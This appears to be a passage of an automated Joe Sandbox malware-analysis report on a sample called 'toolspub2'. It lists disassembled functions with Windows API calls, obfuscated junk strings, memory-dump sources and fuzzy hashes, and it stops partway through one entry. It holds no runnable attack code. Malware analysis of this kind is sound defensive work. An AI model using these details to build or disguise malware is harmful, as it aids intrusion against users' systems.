Opcode ID: 50919bc93fa2f8061e5eb199e8f94d907823d5bc1bf5dd67956261ead9bd21be
Instruction ID: e2e79cfe353b281c4744dd74b599a4136e0e5348a81bceb2a5b81e1ee21f9098
Opcode Fuzzy Hash: 50919bc93fa2f8061e5eb199e8f94d907823d5bc1bf5dd67956261ead9bd21be
Instruction Fuzzy Hash: D721C0B4900B04DBC718DF65F8457483BB4FB2835AFA0613AE9099B2B1E7B46589CF1D

Uniqueness

Uniqueness Score: -1.00%

Function 004171C6 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(Function_00016E25,00000001), ref: 004171DF

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 6443a539d8df846b3b72eb6c0fab6658253dd5c309f49f9c09a3a47b74cff52a
Instruction ID: ce62890c0dcd39347dd3b05c54ddc072d2ff9ca1ce5d093b84bfaf355fb5ff49
Opcode Fuzzy Hash: 6443a539d8df846b3b72eb6c0fab6658253dd5c309f49f9c09a3a47b74cff52a
Instruction Fuzzy Hash: C9D0A771B443054EE3249F30DD457717BE4EB00F14FD0561DCD9E860E0CF789A868644

Uniqueness

Uniqueness Score: -1.00%

Function 00413B87 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,?,?,?), ref: 00413B98

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 45e8a1ee8bb6324da094cacf82e6ec495e9d11125ce25a6e6cbc6e813b072dd5
Instruction ID: b6b6476156e01114a7dc5ce04cbc2897bbc4b98594b9033fbd60286b592b3565
Opcode Fuzzy Hash: 45e8a1ee8bb6324da094cacf82e6ec495e9d11125ce25a6e6cbc6e813b072dd5
Instruction Fuzzy Hash: 46C0023200014DFB8F125F81ED0589A3F2AEB88260B848020FA180502087329931AB55

Uniqueness

Uniqueness Score: -1.00%

Function 00550042 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2052336131.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_550000_toolspub2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: d9a28bb397fccf522ec01ece1f607f8445493c9389a12aba8b6b47eb7125b8e1
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 3911A0723401009FD714CE65DCA5FA677EAFB88331B298056ED08CB3A2D675EC01C760

Uniqueness

Uniqueness Score: -1.00%

Function 0058CD1B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2053247085.000000000058C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0058C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_58c000_toolspub2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 7f63cbab232ff91d6a58ccf5c8184e881004be927989543b88a990d325b4b0b6
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: FE117C72341100AFD754EE55DC81FA67BEAFB88320B2980A5ED04DB316E675E802C760

Uniqueness

Uniqueness Score: -1.00%

Function 00426AB0 Relevance: 98.3, APIs: 41, Strings: 15, Instructions: 272timenetworkCOMMON

Download Yara Rule

APIs

PrivilegedServiceAuditAlarmW.ADVAPI32(Yaletara bahasa puwut hasefij,Mep,00000000,00000000,00000000), ref: 00426AF4
DeleteTimerQueueTimer.KERNEL32 ref: 00426B0B
GetLastError.KERNEL32 ref: 00426B0D
GetCompressedFileSizeW.KERNEL32(00000000,?), ref: 00426B38
GetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00426B62
CancelWaitableTimer.KERNEL32(00000000), ref: 00426B69
_memset.LIBCMT ref: 00426B7F
SetDefaultCommConfigW.KERNEL32(cajorusewucuhazukufi,?,00000000), ref: 00426B94
CopyFileExW.KERNEL32(relazukigihokuni,lafojijuwuna,00000000,00000000,00000000,00000000), ref: 00426BA8
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00426BAF
AddAtomA.KERNEL32(Bahav feruvuyox lasopapexuge), ref: 00426BBA
GetCurrentDirectoryW.KERNEL32(00000000,?), ref: 00426BC8
GetModuleHandleA.KERNEL32(00000000), ref: 00426BCF
EnumDateFormatsExA.KERNEL32(00000000,00000000,00000000), ref: 00426BD8
LeaveCriticalSection.KERNEL32(?), ref: 00426BEE
QueryMemoryResourceNotification.KERNEL32(00000000,00000000), ref: 00426BFF
_sprintf.LIBCMT ref: 00426C0F
GetConsoleAliasExesLengthW.KERNEL32 ref: 00426C39
DnsHostnameToComputerNameA.KERNEL32(Nize yasowure bozurabajebide,?,?), ref: 00426C52
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00426C5E
GetTempFileNameW.KERNEL32(00000000,00000000,00000000,?), ref: 00426C6E
MoveFileExW.KERNEL32(00000000,00000000,00000000), ref: 00426C77
OpenWaitableTimerA.KERNEL32(00000000,00000000,Yuhegoveson daxelowam zitaj roborile), ref: 00426C84
DeactivateActCtx.KERNEL32(00000000,00000000), ref: 00426C8C
GetLongPathNameW.KERNEL32(luvakoyuranomagozak sacabehibasahavakayatebucotanese revobavihi micasicalubufiviwecuhuyapizax hojogokisoyoyodo,?,00000000), ref: 00426C9F
_calloc.LIBCMT ref: 00426CA7
_calloc.LIBCMT ref: 00426CAE
__wfopen_s.LIBCMT ref: 00426CBE
_wscanf.LIBCMT ref: 00426CCB
_memset.LIBCMT ref: 00426CEA
__vswprintf_c_l.LIBCMT ref: 00426D08
_calloc.LIBCMT ref: 00426D12
BuildCommDCBA.KERNEL32(Hojumobulajet topibatara melugamebelazo gizep,?), ref: 00426D7F
SetPriorityClass.KERNEL32(00000000,00000000), ref: 00426D85
GetPrivateObjectSecurity.ADVAPI32(00000000,00000000,00000000,00000000,00000000), ref: 00426D91
SetConsoleOutputCP.KERNEL32(00000000), ref: 00426DEE
SetFileAttributesA.KERNEL32(hovocafisavexujegiselano,00000000), ref: 00426E0A

Strings

0, xrefs: 00426CE0
luvakoyuranomagozak sacabehibasahavakayatebucotanese revobavihi micasicalubufiviwecuhuyapizax hojogokisoyoyodo, xrefs: 00426C9A
0 %s %d %f, xrefs: 00426CC6
Yuhegoveson daxelowam zitaj roborile, xrefs: 00426C7D
Bahav feruvuyox lasopapexuge, xrefs: 00426BB5
Hojumobulajet topibatara melugamebelazo gizep, xrefs: 00426D7A
hovocafisavexujegiselano, xrefs: 00426E05
Yaletara bahasa puwut hasefij, xrefs: 00426AEF
Nize yasowure bozurabajebide, xrefs: 00426C4D
cajorusewucuhazukufi, xrefs: 00426B8F
Mep, xrefs: 00426AEA
0.txt, xrefs: 00426CB8
lafojijuwuna, xrefs: 00426B9E
kernel32.dll, xrefs: 00426C0A
relazukigihokuni, xrefs: 00426BA3

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: File$NameTimer$_calloc$AtomCommConsoleWaitable_memset$AlarmAliasAttributesAuditBuildByteCancelCharClassCompressedComputerConfigCopyCriticalCurrentDateDeactivateDefaultDeleteDirectoryEnumEnvironmentErrorExesFormatsFreeHandleHostnameLastLeaveLengthLongMemoryModuleMoveMultiNotificationObjectOpenOutputPathPriorityPrivatePrivilegedQueryQueueResourceSectionSecurityServiceSizeStringsTempWide__vswprintf_c_l__wfopen_s_sprintf_wscanf
String ID: 0$0 %s %d %f$0.txt$Bahav feruvuyox lasopapexuge$Hojumobulajet topibatara melugamebelazo gizep$Mep$Nize yasowure bozurabajebide$Yaletara bahasa puwut hasefij$Yuhegoveson daxelowam zitaj roborile$cajorusewucuhazukufi$hovocafisavexujegiselano$kernel32.dll$lafojijuwuna$luvakoyuranomagozak sacabehibasahavakayatebucotanese revobavihi micasicalubufiviwecuhuyapizax hojogokisoyoyodo$relazukigihokuni
API String ID: 637433802-3588219892
Opcode ID: 33ff491196336100e3883b7b61bfa3d69095320c901e6b40a6f3b7c38e6cd6b2
Instruction ID: 57cd5ecdf2a7e7b3b3f1dd005c8c8b38e39590fb85e823df72e17cd0abe715ca
Opcode Fuzzy Hash: 33ff491196336100e3883b7b61bfa3d69095320c901e6b40a6f3b7c38e6cd6b2
Instruction Fuzzy Hash: 7191F675A40624ABD730AB60EC45FDB7B78FF09714F8000BAF608A2151DB785A49CFAD

Uniqueness

Uniqueness Score: -1.00%

Function 00415DA1 Relevance: 48.3, APIs: 32, Instructions: 264COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00415DA8
_strlen.LIBCMT ref: 00415DB5
_strlen.LIBCMT ref: 00415DC6
_strlen.LIBCMT ref: 00415DD5
_strlen.LIBCMT ref: 00415DE4
__malloc_crt.LIBCMT ref: 00415DF4

Part of subcall function 0040D8C3: _malloc.LIBCMT ref: 0040D8CF
Part of subcall function 0040D8C3: Sleep.KERNEL32(00000000,00000001,00401178,?,00409D57,00000018,00431698,0000000C,00409DE8,00401178,00403022,?,00403635,00000004,00431608,0000000C), ref: 0040D8E4

_strcpy_s.LIBCMT ref: 00415E40
__invoke_watson.LIBCMT ref: 00415F6D
_strlen.LIBCMT ref: 00415F76
_strcpy_s.LIBCMT ref: 00415F94
__invoke_watson.LIBCMT ref: 00415FA7
_strlen.LIBCMT ref: 00415FB0
_strcpy_s.LIBCMT ref: 00415FCE
__invoke_watson.LIBCMT ref: 00415FE1
_strlen.LIBCMT ref: 00415FEA
_strcpy_s.LIBCMT ref: 00416008
__invoke_watson.LIBCMT ref: 0041601B
_strlen.LIBCMT ref: 00416024
_strcpy_s.LIBCMT ref: 00416042
__invoke_watson.LIBCMT ref: 00415E53

Part of subcall function 00402E42: _memset.LIBCMT ref: 00402E6A
Part of subcall function 00402E42: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00402F1E
Part of subcall function 00402E42: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00402F28
Part of subcall function 00402E42: UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00402F35
Part of subcall function 00402E42: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00402F50
Part of subcall function 00402E42: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00402F57

_strlen.LIBCMT ref: 00415E5C
_strcpy_s.LIBCMT ref: 00415E79
__invoke_watson.LIBCMT ref: 00415E8C
_strlen.LIBCMT ref: 00415E95
_strcpy_s.LIBCMT ref: 00415ED9
__invoke_watson.LIBCMT ref: 00415EEC
_strlen.LIBCMT ref: 00415EF5
_strcpy_s.LIBCMT ref: 00415F12
__invoke_watson.LIBCMT ref: 00415F25
_strlen.LIBCMT ref: 00415F2E
_strcpy_s.LIBCMT ref: 00415F5A
__invoke_watson.LIBCMT ref: 00416055

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: _strlen$__invoke_watson_strcpy_s$ExceptionFilterProcessUnhandled$CurrentDebuggerPresentSleepTerminate__malloc_crt_malloc_memset
String ID:
API String ID: 18894028-0
Opcode ID: 2da3ddec9c9bbe6a2b0218009518d5adec062892e496820dbcaef022814b34d0
Instruction ID: 62c5e9e032bd0babb70a367c025fa1d4f42a97a2e6612b41bafa19c681542216
Opcode Fuzzy Hash: 2da3ddec9c9bbe6a2b0218009518d5adec062892e496820dbcaef022814b34d0
Instruction Fuzzy Hash: 4481A271E10304ABDB11AFB9CC45AFE77B9AF54308F05046AFC04A3252E73DE6558B65

Uniqueness

Uniqueness Score: -1.00%

Function 0040955B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00431648,0000000C,00409696,00000000,00000000,?,?,00403031,00401178), ref: 0040956D
__crt_waiting_on_module_handle.LIBCMT ref: 00409578

Part of subcall function 004019CD: Sleep.KERNEL32(000003E8,00000000,?,00409481,KERNEL32.DLL,?,004094ED,?,00409659,?,?,00403031,00401178), ref: 004019D9
Part of subcall function 004019CD: GetModuleHandleW.KERNEL32(00401178,?,00409481,KERNEL32.DLL,?,004094ED,?,00409659,?,?,00403031,00401178), ref: 004019E2

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 004095A1
GetProcAddress.KERNEL32(?,DecodePointer), ref: 004095B1
__lock.LIBCMT ref: 004095D3
InterlockedIncrement.KERNEL32(00433668), ref: 004095E0
__lock.LIBCMT ref: 004095F4
___addlocaleref.LIBCMT ref: 00409612

Strings

EncodePointer, xrefs: 00409595
DecodePointer, xrefs: 004095A9
h6C, xrefs: 004095CA
KERNEL32.DLL, xrefs: 00409567, 0040956C, 00409577

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL$h6C
API String ID: 1028249917-2610866035
Opcode ID: f530161b5d7a7c8fe7398e99c9650a9d9526d25a5e3316f40305c723743cc6a9
Instruction ID: 38414387081301318da3d31faf12bbcc661272fe51da5c6d93fd2aa65b25002e
Opcode Fuzzy Hash: f530161b5d7a7c8fe7398e99c9650a9d9526d25a5e3316f40305c723743cc6a9
Instruction Fuzzy Hash: 28116371940701EED720AF769C01B5ABBF4AF04314F90853FE499A22D2CB789A45CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 004268E0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 55COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(Ceya duhetipirowag yafufaweb daharen mariza,?), ref: 00426910
WritePrivateProfileStringA.KERNEL32(banixofokex,juxecoyezarono,pizuyudici,tugoxupijebuvizanigijevawixolutu), ref: 00426949
FreeEnvironmentStringsW.KERNEL32(00000000,?,74E02FF0,?), ref: 0042694D
GetServiceKeyNameW.ADVAPI32(00000000,Torupuhuv xuxi vuxokigisutica vomirovexidosal,?), ref: 00426978

Strings

juxecoyezarono, xrefs: 0042693F
Torupuhuv xuxi vuxokigisutica vomirovexidosal, xrefs: 00426971
tugoxupijebuvizanigijevawixolutu, xrefs: 00426935
Ceya duhetipirowag yafufaweb daharen mariza, xrefs: 0042690B
pizuyudici, xrefs: 0042693A
banixofokex, xrefs: 00426944

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: BuildCommEnvironmentFreeNamePrivateProfileServiceStringStringsWrite
String ID: Ceya duhetipirowag yafufaweb daharen mariza$Torupuhuv xuxi vuxokigisutica vomirovexidosal$banixofokex$juxecoyezarono$pizuyudici$tugoxupijebuvizanigijevawixolutu
API String ID: 705697790-4275832584
Opcode ID: 35640c3dad6e11e9fc5739bb049d55e361af009f955ded696877e2bcb95b8972
Instruction ID: 64ac506d9c09a1d42ab0e6563ca2bbb336d7f31fbdb25985db0f18a8e76d9b4c
Opcode Fuzzy Hash: 35640c3dad6e11e9fc5739bb049d55e361af009f955ded696877e2bcb95b8972
Instruction Fuzzy Hash: 09112CB17043509BD330AB18EC92B5BB7E0FB4C720FD1963EE59997281DA7814458B9E

Uniqueness

Uniqueness Score: -1.00%

Function 004269B0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

SetSystemTimeAdjustment.KERNEL32(00000000,00000000), ref: 004269DE
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?,00000000), ref: 00426A2B
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00426A33
EqualSid.ADVAPI32(00000000,00000000), ref: 00426A3D
ReadEventLogW.ADVAPI32(00000000,00000000,00000000,?,00000000,?,?), ref: 00426A5A
CancelDeviceWakeupRequest.KERNEL32(00000000), ref: 00426A62
SetEndOfFile.KERNEL32(00000000), ref: 00426A6A
SetFileShortNameA.KERNEL32(00000000,ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi), ref: 00426A8C

Strings

ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi, xrefs: 00426A85

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: FileRead$AdjustmentCancelConsoleDeviceEnvironmentEqualEventFreeNameOutputRequestShortStringsSystemTimeWakeup
String ID: ximawazudikahefafopoporifozib kadamuzayecep hizujajugejusawaharidam wunoguzazapeguvecazageganuzi
API String ID: 3623590145-61754389
Opcode ID: f1b75480b0209e74a1abc7fbf10d5c9742aa7cda4821ea446333e37730f4c788
Instruction ID: 44a6ae71580e0fcb853c2d9d1219bea36fb1508ceb14b65d447442c2a540a406
Opcode Fuzzy Hash: f1b75480b0209e74a1abc7fbf10d5c9742aa7cda4821ea446333e37730f4c788
Instruction Fuzzy Hash: 6B215E72748300ABD320DFA4EC46F5B73B4BB98B11F80483EF249C61A1D67495498B5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040D58A Relevance: 15.1, APIs: 10, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 0040D5A3

Part of subcall function 0040D908: __calloc_impl.LIBCMT ref: 0040D919
Part of subcall function 0040D908: Sleep.KERNEL32(00000000,00403031,00401178), ref: 0040D930

__calloc_crt.LIBCMT ref: 0040D5C7
__calloc_crt.LIBCMT ref: 0040D5E3
__copytlocinfo_nolock.LIBCMT ref: 0040D608
__setlocale_nolock.LIBCMT ref: 0040D615
___removelocaleref.LIBCMT ref: 0040D621
___freetlocinfo.LIBCMT ref: 0040D628
__setmbcp_nolock.LIBCMT ref: 0040D640
___removelocaleref.LIBCMT ref: 0040D655
___freetlocinfo.LIBCMT ref: 0040D65C

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 2969281212-0
Opcode ID: 9581f7f604f8001c007002e59548ec845f1b1826ada96b7715f36a1aaad0263f
Instruction ID: 817d4a2ebd6908bd71ad8073f72c35fe17dceba1db1b760a1892f3269dc0c09a
Opcode Fuzzy Hash: 9581f7f604f8001c007002e59548ec845f1b1826ada96b7715f36a1aaad0263f
Instruction Fuzzy Hash: 3B210435904601EAD7357FA6DC4290A7BE4EF41728B20443FF889B72D1EE3A98089A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00426DD7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetConsoleOutputCP.KERNEL32(00000000), ref: 00426DEE
SetFileAttributesA.KERNEL32(hovocafisavexujegiselano,00000000), ref: 00426E0A
WriteConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?), ref: 00426E2F
GetMonitorInfoA.USER32(00000000,?), ref: 00426E59
GetAtomNameA.KERNEL32(00000000,00000000,00000000), ref: 00426E61
GetDesktopWindow.USER32 ref: 00426E67

Strings

hovocafisavexujegiselano, xrefs: 00426E05

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: ConsoleOutput$AtomAttributesCharacterDesktopFileInfoMonitorNameWindowWrite
String ID: hovocafisavexujegiselano
API String ID: 400266613-3738165051
Opcode ID: 085b13d080455bed6ca4aabeac0a2c6582ace0417400fdf6c9036128e1df5eed
Instruction ID: e829bde6b2c889ce344c6e5f79bdc2eb79f7f025e10f4c1c8497635cedb2b85d
Opcode Fuzzy Hash: 085b13d080455bed6ca4aabeac0a2c6582ace0417400fdf6c9036128e1df5eed
Instruction Fuzzy Hash: 4211C179B802289BEB249B74EC41BEEB374EB54710F5251BAE918A7290CA708941CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C059 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0040C065

Part of subcall function 004096BB: __getptd_noexit.LIBCMT ref: 004096BE
Part of subcall function 004096BB: __amsg_exit.LIBCMT ref: 004096CB

__amsg_exit.LIBCMT ref: 0040C085
__lock.LIBCMT ref: 0040C095
InterlockedDecrement.KERNEL32(?), ref: 0040C0B2
InterlockedIncrement.KERNEL32(02092CE8), ref: 0040C0DD

Strings

h6C, xrefs: 0040C0BC

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID: h6C
API String ID: 4271482742-3746349781
Opcode ID: e4fc002241ae634dc6dc08462a2446027ba5388c5da3f76bdfb5296a60784a0c
Instruction ID: d50b1a2ced468b1754953f9b5a5f6bca8878d5be435afff6b736c3485e9efe4a
Opcode Fuzzy Hash: e4fc002241ae634dc6dc08462a2446027ba5388c5da3f76bdfb5296a60784a0c
Instruction Fuzzy Hash: 93018E72901611EBC720BFE9988675A77A0BB04715F00423BE814B72D1CB3C6D41DBDD

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA35 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0040CA41

Part of subcall function 004096BB: __getptd_noexit.LIBCMT ref: 004096BE
